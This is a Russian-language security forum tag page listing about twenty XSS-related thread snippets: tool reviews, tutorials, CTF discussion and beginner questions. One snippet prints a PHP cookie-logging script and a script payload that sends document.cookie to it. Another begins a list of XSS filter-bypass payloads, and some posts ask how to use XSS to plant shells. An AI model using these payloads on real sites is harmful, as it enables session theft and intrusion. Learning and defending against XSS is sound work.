xss

  1. Y

    Проблема Реализация CVE-2016-5682 Swager 2.0

    Есть api на Swager 2.0 Swagger UI как можно реализовать XSS атак и защиту? Пример реализации атаки R7-2016-19: Persistent XSS via Unescaped Parameters in Swagger-UI (CVE-2016-5682)
  2. Iskus

    XSS game от Google

    Всем салют, вот наткнулся сегодня случайно на игру от компании Google, которая позволяет потренировать свои навыки работы с приложениями, которые не достаточно качественно фильтруют пользовательский ввод, в следствии чего появляется возможность выполнения кода не предусмотренного логикой...
  3. R

    Решено Помощь с XSS

    Получается вот такой пэйлод, как избавиться от символа "]", чтобы всё отработало? <textarea name="subscribe"> my_payload - пользовательские данные:
  4. C

    International Bug Bounty Group

    We invite talented Russian hackers Telegram @ redco1234
  5. Vertigo

    Soft Тестируем ресурс с AngelSword

    Добрый день,Уважаемые Жители Форума,Друзья и Читатели. В эти выходные довелось провести тест одного ресурса. Как-то убежал из вида при этом интересный инструмент для проведения pentest. Восполняю пробел,так сказать. Создал софт Lucifer1993 - это мощная китайская школа пентеста. Несмотря на...
  6. The Codeby

    Статья Хакерские плагины для Chrome

    Это аналог статьи «Хакерские плагины для Firefox», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать. Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является Интернет-магазин Chrome. Пусть нас...
  7. F

    Решено XSS атака или подставное шоу на 2х миллионную аудиторию?

    Всем доброго времени суток! Еще давно наблюдал данный контент и как то было лень опровергать это, да и времени не было, а вот сейчас призадумался, не пи#%шь ли это? (сразу вспомнил шоу идиоты на карамба тв :D) Так вот суть: "Каратель шк" ищет на серверах (кс-го) школьников которые хотят обмануть...
  8. Doctor zlo

    Эксплуатация XSS

    Начал изучать xss. Сразу появился вопрос. Если ресурс уязвим к данной атаке, можно ли с помощью этой уязвимости, загрузить на атакуемый сервер payload и получить доступ к серверу?
  9. Vertigo

    Soft Kill Shot-Инструмент для тестирования на проникновение

    Добрый вечер,Уважаемые Форумчане и Друзья. Сегодня вам хочу представить интересный небольшой framework. Создателем этого замечательного инструмента является Bahaabdelwahed. Арабская школа пентеста. В killshot входят многие модули расположенные для удобства тестирования в подменю. Начинать...
  10. Tayrus

    Статья Получаем XSS на сайте через .docx файл

    Всякий раз, когда я вижу форму загрузки файла во время теста , я обращаю на это внимание. В лучшем случае я могу загрузить обратную оболочку(shell) на языке сценариев, доступном на веб-сервере. Если приложение работает например на PHP или ASP, это становится довольно легко. Если я не могу...
  11. p0stman

    Для начального и глубокого освоения XSS атак с чего начать?

    Бодрый вечер, очень интересует тема xss уязвимостей, насколько я понял, для этого в изучении нужен в основном javascript или что то еще? Погуглив понял, что в основном все JS туторы созданы для фронт-енд(тот же UDEMY полон туторов для веба), может быть есть какая то особая прикладная область...
  12. Lisenok

    Статья Typo3. xss уязвимость расширения.

    Доброго времени суток господа и дамы. Сегодня опишу уязвимость найденную в расширение tt_news для typo3. Мы имеем typo3 версии 6.2.30 , расширение tt_news версии 3.6.0 (выделено красным). Так вот при создании новости на сайте, можно внедрить свой ява-скрипт код. Он отрабатывается и в поле...
  13. Tayrus

    Проблема Проблема с XSS

    Нашел на одном сайте XSS, решил сделать куки стилер создал файл в него закинул такой код <?php $cookie = $_GET['cookie']; $log = fopen("xssed.txt","a"); fwrite($log, $cookie ."\n"); fclose($log); ?> Вставляю в уязвимый параметр: <ScRiPt>window.location = '' + document.cookie;</ScRiPt> На сайте...
  14. K

    HACKER101

    Статья для участия в конкурсена codeby Многие видели hackerone выложили курс по безопасности веба с видеоуроками как по мне уроки для совсем начинающих но к ним есть практические задания которые оказались очень даже интересными и тут я опишу некоторые решения которые получились у меня. level...
  15. S

    XsSCan - Web Application XSS Scanner

    XsSCan - это инструмент python для поиска уязвимостей Cross Site Scripting на веб-сайтах. Этот инструмент является лучшим в своем роде. Вместо того, чтобы просто проверять одну страницу, как это делают большинство инструментов, этот инструмент просматривает весь веб-сайт и сначала находит все...
  16. r0hack

    Статья [1] - Безопасный PHP. Защита от XSS атак.

    Всем Салам. Сегодня уже 2 часть из цикла статей безопасный PHP. И эта статья обещает быть информативной, особенно для новичков. И чтобы было представление о XSS, я разделю статью на 2 части, где в 1ом разберем, что за зверь этот XSS. А во втором рассмотрим, как она эксплуатируется в PHP и как...
  17. r0hack

    CTF - делимся решениями, обсуждаем

    Не много тем про CTF, а ведь многие именно благодаря этим соревнованиям, начинают интересоваться ИБ и хакингом. Поэтому предлагаю, делится решениями нестандартных тасков, да и в общем продвигаться в этой области на форуме. В перспективе собрать команду Codeby, можно даже несколько, уверен...
  18. SooLFaa

    XSS Tricks

    Решил некоторые байпассы XSS фильтров собрать. И предлагаю дополнять эту тему. Payload #1: <svg xml:base="data:image/svg+xml;base64, PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW...
  19. Vertigo

    XSStrike-Fuzz and Bruteforce Parameters for XSS

    Приветствую Уважаемых Друзей,Форумчан и Дорогих гостей нашего форума. Сегодня обзор будет о инструменте-сканере xsstrike от замечательного автора UltimateHackers Сомневался по-поводу целесообразности обзора. Но т.к.сведения о сканере начали активно распространяться,решился. В задачи...
  20. Dosia

    XSS уязвимость ( WordPress )

    Здравствуйте! При сканировании сайта на WordPress, была выявлена версия 3.4.2, так-же две уязвимости XSS: WordPress Plupload Unspecified XSS, Cross-Site scripting XSS. Как использовать эти уязвимости для атаки на тестируемый ресурс? ( Проникновение, переправка URL, загрузка shell и тд. )